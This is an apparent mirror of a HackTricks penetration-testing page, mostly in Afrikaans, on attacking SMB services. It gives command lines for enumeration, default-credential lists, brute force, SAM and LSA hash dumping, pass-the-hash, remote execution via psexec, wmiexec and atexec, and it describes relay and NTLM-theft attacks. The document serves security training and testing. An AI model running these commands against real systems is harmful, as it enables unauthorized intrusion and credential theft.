mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-01 08:59:30 +00:00
555 lines
28 KiB
Markdown
555 lines
28 KiB
Markdown
# 139,445 - Pentesting SMB
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## **Port 139**
|
||
|
||
Die _**Network Basic Input Output System**_** (NetBIOS)** is 'n sagtewareprotokol wat ontwerp is om toepassings, rekenaars en werkstasies binne 'n plaaslike area netwerk (LAN) in staat te stel om met netwerkhardeware te kommunikeer en **die oordrag van data oor die netwerk te fasiliteer**. Die identifikasie en ligging van sagtewaretoepassings wat op 'n NetBIOS-netwerk werk, word bereik deur hul NetBIOS-names, wat tot 16 karakters lank kan wees en dikwels verskillend is van die rekenaarnaam. 'n NetBIOS-sessie tussen twee toepassings word geinitieer wanneer een toepassing (wat as die kliënt optree) 'n opdrag gee om "te bel" na 'n ander toepassing (wat as die bediener optree) deur gebruik te maak van **TCP Port 139**.
|
||
```
|
||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||
```
|
||
## Port 445
|
||
|
||
Tegnies word Port 139 verwys as ‘NBT oor IP’, terwyl Port 445 geïdentifiseer word as ‘SMB oor IP’. Die akroniem **SMB** staan vir ‘**Server Message Blocks**’, wat ook modern bekend staan as die **Common Internet File System (CIFS)**. As 'n toepassingslaagnetwerkprotokol, word SMB/CIFS hoofsaaklik gebruik om gedeelde toegang tot lêers, drukkers, seriële poorte te fasiliteer, en verskeie vorme van kommunikasie tussen knooppunte op 'n netwerk te ondersteun.
|
||
|
||
Byvoorbeeld, in die konteks van Windows, word dit beklemtoon dat SMB direk oor TCP/IP kan werk, wat die noodsaaklikheid vir NetBIOS oor TCP/IP uitskakel, deur die gebruik van poort 445. Aan die ander kant, op verskillende stelsels, word die gebruik van poort 139 waargeneem, wat aandui dat SMB saam met NetBIOS oor TCP/IP uitgevoer word.
|
||
```
|
||
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
|
||
```
|
||
### SMB
|
||
|
||
Die **Server Message Block (SMB)** protokol, wat in 'n **klient-bediener** model werk, is ontwerp om **toegang tot lêers**, gidse, en ander netwerkbronne soos drukkers en routers te reguleer. Primêr gebruik binne die **Windows** bedryfstelselreeks, verseker SMB terugwaartse kompatibiliteit, wat toestelle met nuwer weergawes van Microsoft se bedryfstelsel in staat stel om naatloos met dié wat ouer weergawes gebruik, te kommunikeer. Boonop bied die **Samba** projek 'n gratis sagtewareoplossing, wat SMB se implementering op **Linux** en Unix stelsels moontlik maak, en sodoende kruisplatformkommunikasie deur SMB fasiliteer.
|
||
|
||
Aandele, wat **arbitraire dele van die plaaslike lêerstelsel** verteenwoordig, kan deur 'n SMB-bediener verskaf word, wat die hiërargie gedeeltelik **onafhanklik** van die bediener se werklike struktuur sigbaar maak aan 'n kliënt. Die **Access Control Lists (ACLs)**, wat **toegangsregte** definieer, stel **fynbeheer** oor gebruikersregte moontlik, insluitend eienskappe soos **`execute`**, **`read`**, en **`full access`**. Hierdie regte kan aan individuele gebruikers of groepe toegeken word, gebaseer op die aandele, en is onderskeibaar van die plaaslike regte wat op die bediener gestel is.
|
||
|
||
### IPC$ Share
|
||
|
||
Toegang tot die IPC$ aandele kan verkry word deur 'n anonieme nul sessie, wat interaksie met dienste wat via benoemde pype blootgestel word, moontlik maak. Die nut `enum4linux` is nuttig vir hierdie doel. Indien korrek gebruik, stel dit die verkryging van:
|
||
|
||
* Inligting oor die bedryfstelsel
|
||
* Besonderhede oor die ouerdomein
|
||
* 'n Samestelling van plaaslike gebruikers en groepe
|
||
* Inligting oor beskikbare SMB aandele
|
||
* Die effektiewe stelselsekuriteitsbeleid
|
||
|
||
Hierdie funksionaliteit is krities vir netwerkadministrateurs en sekuriteitsprofessionals om die sekuriteitsposisie van SMB (Server Message Block) dienste op 'n netwerk te evalueer. `enum4linux` bied 'n omvattende oorsig van die teikenstelsel se SMB omgewing, wat noodsaaklik is om potensiële kwesbaarhede te identifiseer en te verseker dat die SMB dienste behoorlik beveilig is.
|
||
```bash
|
||
enum4linux -a target_ip
|
||
```
|
||
Die bogenoemde opdrag is 'n voorbeeld van hoe `enum4linux` gebruik kan word om 'n volledige enumerasie teen 'n teiken gespesifiseer deur `target_ip` uit te voer.
|
||
|
||
## Wat is NTLM
|
||
|
||
As jy nie weet wat NTLM is of jy wil weet hoe dit werk en hoe om dit te misbruik nie, sal jy hierdie bladsy oor **NTLM** baie interessant vind waar verduidelik word **hoe hierdie protokol werk en hoe jy daarvan kan voordeel trek:**
|
||
|
||
{% content-ref url="../windows-hardening/ntlm/" %}
|
||
[ntlm](../windows-hardening/ntlm/)
|
||
{% endcontent-ref %}
|
||
|
||
## **Bediener Enumerasie**
|
||
|
||
### **Skandeer** 'n netwerk op soek na gasheer:
|
||
```bash
|
||
nbtscan -r 192.168.0.1/24
|
||
```
|
||
### SMB bediener weergawe
|
||
|
||
Om te soek na moontlike exploits vir die SMB weergawe, is dit belangrik om te weet watter weergawe gebruik word. As hierdie inligting nie in ander gebruikte gereedskap verskyn nie, kan jy:
|
||
|
||
* Gebruik die **MSF** bykomende module \_**auxiliary/scanner/smb/smb\_version**
|
||
* Of hierdie skrip:
|
||
```bash
|
||
#!/bin/sh
|
||
#Author: rewardone
|
||
#Description:
|
||
# Requires root or enough permissions to use tcpdump
|
||
# Will listen for the first 7 packets of a null login
|
||
# and grab the SMB Version
|
||
#Notes:
|
||
# Will sometimes not capture or will print multiple
|
||
# lines. May need to run a second time for success.
|
||
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
|
||
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
|
||
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
|
||
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
|
||
echo "" && sleep .1
|
||
```
|
||
### **Soek ontginning**
|
||
```bash
|
||
msf> search type:exploit platform:windows target:2008 smb
|
||
searchsploit microsoft smb
|
||
```
|
||
### **Mogelijke** Kredensiaal
|
||
|
||
| **Gebruikersnaam(s)** | **Gewone wagwoorde** |
|
||
| --------------------- | ----------------------------------------- |
|
||
| _(leeg)_ | _(leeg)_ |
|
||
| gasheer | _(leeg)_ |
|
||
| Administrateur, admin | _(leeg)_, wagwoord, administrateur, admin |
|
||
| arcserve | arcserve, rugsteun |
|
||
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
|
||
| backupexec, rugsteun | backupexec, rugsteun, arcada |
|
||
| toets, laboratorium, demo | wagwoord, toets, laboratorium, demo |
|
||
|
||
### Brute Force
|
||
|
||
* [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb)
|
||
|
||
### SMB Omgewing Inligting
|
||
|
||
### Verkry Inligting
|
||
```bash
|
||
#Dump interesting information
|
||
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
|
||
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
|
||
nmap --script "safe or smb-enum-*" -p 445 <IP>
|
||
|
||
#Connect to the rpc
|
||
rpcclient -U "" -N <IP> #No creds
|
||
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
|
||
rpcclient -U "username%passwd" <IP> #With creds
|
||
#You can use querydispinfo and enumdomusers to query user information
|
||
|
||
#Dump user information
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
|
||
#Map possible RPC endpoints
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
```
|
||
### Lys gebruikers, groepe & ingelogde gebruikers
|
||
|
||
Hierdie inligting moet reeds versamel wees van enum4linux en enum4linux-ng
|
||
```bash
|
||
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
|
||
|
||
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
|
||
|
||
rpcclient -U "" -N 10.10.10.10
|
||
enumdomusers
|
||
enumdomgroups
|
||
```
|
||
### Lys plaaslike gebruikers
|
||
|
||
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
|
||
```bash
|
||
lookupsid.py -no-pass hostname.local
|
||
```
|
||
Oneliner
|
||
```bash
|
||
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
|
||
```
|
||
### Metasploit - Lys plaaslike gebruikers
|
||
```bash
|
||
use auxiliary/scanner/smb/smb_lookupsid
|
||
set rhosts hostname.local
|
||
run
|
||
```
|
||
### **Opname van LSARPC en SAMR rpcclient**
|
||
|
||
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
|
||
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
|
||
{% endcontent-ref %}
|
||
|
||
### GUI-verbinding vanaf linux
|
||
|
||
#### In die terminal:
|
||
|
||
`xdg-open smb://cascade.htb/`
|
||
|
||
#### In lêerblaaier venster (nautilus, thunar, ens.)
|
||
|
||
`smb://friendzone.htb/general/`
|
||
|
||
## Gedeelde Mappes Opname
|
||
|
||
### Lys gedeelde mappes
|
||
|
||
Dit word altyd aanbeveel om te kyk of jy toegang tot enigiets kan kry, as jy nie inligting het nie, probeer om **null** **inligting/gaste gebruiker** te gebruik.
|
||
```bash
|
||
smbclient --no-pass -L //<IP> # Null user
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
|
||
smbmap -H <IP> [-P <PORT>] #Null user
|
||
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
|
||
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
|
||
|
||
crackmapexec smb <IP> -u '' -p '' --shares #Null user
|
||
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
|
||
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
|
||
```
|
||
### **Verbind/Lys 'n gedeelde vouer**
|
||
```bash
|
||
#Connect using smbclient
|
||
smbclient --no-pass //<IP>/<Folder>
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
|
||
|
||
#List with smbmap, without folder it list everything
|
||
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
|
||
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
|
||
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
```
|
||
### **Handmatig vensters deel en verbind daarmee**
|
||
|
||
Dit mag dalk moontlik wees dat jy beperk is om enige dele van die gasheer masjien te vertoon en wanneer jy probeer om hulle op te lys, lyk dit asof daar geen dele is om mee te verbind nie. Dit mag dus die moeite werd wees om te probeer om handmatig met 'n deel te verbind. Om die dele handmatig te lys, wil jy dalk soek na antwoorde soos NT\_STATUS\_ACCESS\_DENIED en NT\_STATUS\_BAD\_NETWORK\_NAME, wanneer jy 'n geldige sessie gebruik (bv. null session of geldige geloofsbriewe). Hierdie mag aandui of die deel bestaan en jy nie toegang daartoe het nie of die deel glad nie bestaan nie.
|
||
|
||
Gewone deelname vir venster teikens is
|
||
|
||
* C$
|
||
* D$
|
||
* ADMIN$
|
||
* IPC$
|
||
* PRINT$
|
||
* FAX$
|
||
* SYSVOL
|
||
* NETLOGON
|
||
|
||
(Gewone deelname van _**Network Security Assessment 3rd edition**_)
|
||
|
||
Jy kan probeer om met hulle te verbind deur die volgende opdrag te gebruik
|
||
```bash
|
||
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
|
||
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
|
||
```
|
||
of hierdie skrif (met 'n null-sessie)
|
||
```bash
|
||
#/bin/bash
|
||
|
||
ip='<TARGET-IP-HERE>'
|
||
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
|
||
|
||
for share in ${shares[*]}; do
|
||
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
|
||
|
||
if [[ -z $output ]]; then
|
||
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
|
||
else
|
||
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
|
||
fi
|
||
done
|
||
```
|
||
voorbeelde
|
||
```bash
|
||
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
|
||
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
|
||
```
|
||
### **Lys deel van Windows / sonder derdeparty gereedskap**
|
||
|
||
PowerShell
|
||
```powershell
|
||
# Retrieves the SMB shares on the locale computer.
|
||
Get-SmbShare
|
||
Get-WmiObject -Class Win32_Share
|
||
# Retrieves the SMB shares on a remote computer.
|
||
get-smbshare -CimSession "<computer name or session object>"
|
||
# Retrieves the connections established from the local SMB client to the SMB servers.
|
||
Get-SmbConnection
|
||
```
|
||
CMD-konsol
|
||
```shell
|
||
# List shares on the local computer
|
||
net share
|
||
# List shares on a remote computer (including hidden ones)
|
||
net view \\<ip> /all
|
||
```
|
||
MMC Snap-in (grafies)
|
||
```shell
|
||
# Shared Folders: Shared Folders > Shares
|
||
fsmgmt.msc
|
||
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
|
||
compmgmt.msc
|
||
```
|
||
explorer.exe (grafies), voer `\\<ip>\` in om die beskikbare nie-verborgen gedeeltes te sien.
|
||
|
||
### Monteer 'n gedeelde gids
|
||
```bash
|
||
mount -t cifs //x.x.x.x/share /mnt/share
|
||
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
|
||
```
|
||
### **Laai lêers af**
|
||
|
||
Lees vorige afdelings om te leer hoe om met akrediteer/Pass-the-Hash te verbind.
|
||
```bash
|
||
#Search a file and download
|
||
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
|
||
```
|
||
|
||
```bash
|
||
#Download all
|
||
smbclient //<IP>/<share>
|
||
> mask ""
|
||
> recurse
|
||
> prompt
|
||
> mget *
|
||
#Download everything to current directory
|
||
```
|
||
Commands:
|
||
|
||
* mask: spesifiseer die masker wat gebruik word om die lêers binne die gids te filter (bv. "" vir alle lêers)
|
||
* recurse: skakel rekursie aan (verstek: af)
|
||
* prompt: skakel vrae vir lêernaam af (verstek: aan)
|
||
* mget: kopieer alle lêers wat ooreenstem met die masker van die gasheer na die kliëntmasjien
|
||
|
||
(_Inligting van die manblad van smbclient_)
|
||
|
||
### Domein Gedeelde Gidsen Soektog
|
||
|
||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
|
||
```bash
|
||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||
```
|
||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spin.
|
||
* `-M spider_plus [--share <share_name>]`
|
||
* `--pattern txt`
|
||
```bash
|
||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
||
```
|
||
Spesifiek interessant van gedeeltes is die lêers genoem **`Registry.xml`** aangesien hulle **miskien wagwoorde** bevat vir gebruikers wat met **autologon** via Groepbeleid gekonfigureer is. Of **`web.config`** lêers aangesien hulle akrediteer.
|
||
|
||
{% hint style="info" %}
|
||
Die **SYSVOL-gedeelte** is **leesbaar** deur alle geverifieerde gebruikers in die domein. Daar kan jy **baie** verskillende batch, VBScript, en PowerShell **scripts** **vind**.\
|
||
Jy moet die **scripts** daarin **kontroleer** aangesien jy **sensitiewe** inligting soos **wagwoorde** mag **vind**.
|
||
{% endhint %}
|
||
|
||
## Lees Register
|
||
|
||
Jy mag in staat wees om die **register te lees** met behulp van sommige ontdekte akrediteer. Impacket **`reg.py`** laat jou toe om te probeer:
|
||
```bash
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
|
||
```
|
||
## Post Exploitation
|
||
|
||
Die **standaardkonfigurasie van** 'n **Samba** bediener is gewoonlik geleë in `/etc/samba/smb.conf` en mag 'n paar **gevaarlike konfigurasies** hê:
|
||
|
||
| **Instelling** | **Beskrywing** |
|
||
| --------------------------- | ----------------------------------------------------------------- |
|
||
| `browseable = yes` | Laat toe om beskikbare gedeeltes in die huidige gedeelte te lys? |
|
||
| `read only = no` | Verbied die skepping en wysiging van lêers? |
|
||
| `writable = yes` | Laat gebruikers toe om lêers te skep en te wysig? |
|
||
| `guest ok = yes` | Laat toe om aan die diens te koppel sonder om 'n wagwoord te gebruik? |
|
||
| `enable privileges = yes` | Eer die voorregte wat aan spesifieke SID toegeken is? |
|
||
| `create mask = 0777` | Watter regte moet aan die nuutgeskepte lêers toegeken word? |
|
||
| `directory mask = 0777` | Watter regte moet aan die nuutgeskepte gidse toegeken word? |
|
||
| `logon script = script.sh` | Watter skrip moet uitgevoer word wanneer die gebruiker aanmeld? |
|
||
| `magic script = script.sh` | Watter skrip moet uitgevoer word wanneer die skrip gesluit word? |
|
||
| `magic output = script.out` | Waar moet die uitvoer van die magiese skrip gestoor word? |
|
||
|
||
Die opdrag `smbstatus` gee inligting oor die **bediener** en oor **wie verbind is**.
|
||
|
||
## Authenticate using Kerberos
|
||
|
||
Jy kan **authentiseer** met **kerberos** deur die gereedskap **smbclient** en **rpcclient** te gebruik:
|
||
```bash
|
||
smbclient --kerberos //ws01win10.domain.com/C$
|
||
rpcclient -k ws01win10.domain.com
|
||
```
|
||
## **Voer Opdragte Uit**
|
||
|
||
### **crackmapexec**
|
||
|
||
crackmapexec kan opdragte uitvoer **deur** enige van **mmcexec, smbexec, atexec, wmiexec** met **wmiexec** as die **standaard** metode. Jy kan aandui watter opsie jy verkies om te gebruik met die parameter `--exec-method`:
|
||
```bash
|
||
apt-get install crackmapexec
|
||
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
|
||
```
|
||
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
|
||
|
||
Albei opsies sal **nuwe diens skep** (met _\pipe\svcctl_ via SMB) op die slagoffer masjien en dit gebruik om **iets uit te voer** (**psexec** sal **oplaai** 'n uitvoerbare lêer na ADMIN$ deel en **smbexec** sal na **cmd.exe/powershell.exe** wys en die argumente die payload --**file-less technique-**- insit).\
|
||
**Meer inligting** oor [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)en [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./psexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
psexec \\192.168.122.66 -u Administrator -p 123456Ww
|
||
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
|
||
```
|
||
Using **parameter**`-k` kan jy teen **kerberos** autentiseer in plaas van **NTLM**
|
||
|
||
### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec
|
||
|
||
Stealthily voer 'n opdragskil uit sonder om die skyf aan te raak of 'n nuwe diens te laat loop deur DCOM via **port 135.**\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
|
||
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
Gebruik **parameter**`-k` kan jy teen **kerberos** autentiseer in plaas van **NTLM**
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
### [AtExec](../windows-hardening/ntlm/atexec.md)
|
||
|
||
Voer opdragte uit via die Taakbeplanner (met _\pipe\atsvc_ via SMB).\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
|
||
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
|
||
```
|
||
## Impacket verwysing
|
||
|
||
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
|
||
|
||
## **Bruteforce gebruikers se akkredeite**
|
||
|
||
**Dit word nie aanbeveel nie, jy kan 'n rekening blokkeer as jy die maksimum toegelate pogings oorskry**
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
|
||
```
|
||
## SMB relay aanval
|
||
|
||
Hierdie aanval gebruik die Responder toolkit om **SMB-authentikasiesessies** op 'n interne netwerk te **vang**, en **oor te dra** na 'n **teikenmasjien**. As die authentikasie **sessie suksesvol is**, sal dit jou outomaties in 'n **stelsel** **skulp** laat val.\
|
||
[**Meer inligting oor hierdie aanval hier.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||
|
||
## SMB-Trap
|
||
|
||
Die Windows biblioteek URLMon.dll probeer outomaties om te autentiseer met die gasheer wanneer 'n bladsy probeer om toegang te verkry tot 'n paar inhoud via SMB, byvoorbeeld: `img src="\\10.10.10.10\path\image.jpg"`
|
||
|
||
Dit gebeur met die funksies:
|
||
|
||
* URLDownloadToFile
|
||
* URLDownloadToCache
|
||
* URLOpenStream
|
||
* URLOpenBlockingStream
|
||
|
||
Wat deur sommige blaaiers en gereedskap (soos Skype) gebruik word.
|
||
|
||
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
|
||
|
||
### SMBTrap met MitMf
|
||
|
||
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
|
||
|
||
## NTLM Diefstal
|
||
|
||
Soos SMB Trapping, kan die plant van kwaadwillige lêers op 'n teikenstelsel (via SMB, byvoorbeeld) 'n SMB-authentikasiepoging uitlok, wat die NetNTLMv2-hash toelaat om met 'n hulpmiddel soos Responder onderskep te word. Die hash kan dan offline gekraak of in 'n [SMB relay aanval](pentesting-smb.md#smb-relay-attack) gebruik word.
|
||
|
||
[Siende: ntlm\_diefstal](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
|
||
|
||
## HackTricks Outomatiese Opdragte
|
||
```
|
||
Protocol_Name: SMB #Protocol Abbreviation if there is one.
|
||
Port_Number: 137,138,139 #Comma separated if there is more than one.
|
||
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
|
||
|
||
Entry_1:
|
||
Name: Notes
|
||
Description: Notes for SMB
|
||
Note: |
|
||
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
|
||
|
||
#These are the commands I run in order every time I see an open SMB port
|
||
|
||
With No Creds
|
||
nbtscan {IP}
|
||
smbmap -H {IP}
|
||
smbmap -H {IP} -u null -p null
|
||
smbmap -H {IP} -u guest
|
||
smbclient -N -L //{IP}
|
||
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
|
||
rpcclient {IP}
|
||
rpcclient -U "" {IP}
|
||
crackmapexec smb {IP}
|
||
crackmapexec smb {IP} --pass-pol -u "" -p ""
|
||
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
|
||
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
|
||
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
|
||
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
|
||
getArch.py -target {IP}
|
||
|
||
With Creds
|
||
smbmap -H {IP} -u {Username} -p {Password}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
|
||
crackmapexec smb {IP} -u {Username} -p {Password} --shares
|
||
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
|
||
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
|
||
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
|
||
|
||
https://book.hacktricks.xyz/pentesting/pentesting-smb
|
||
|
||
Entry_2:
|
||
Name: Enum4Linux
|
||
Description: General SMB Scan
|
||
Command: enum4linux -a {IP}
|
||
|
||
Entry_3:
|
||
Name: Nmap SMB Scan 1
|
||
Description: SMB Vuln Scan With Nmap
|
||
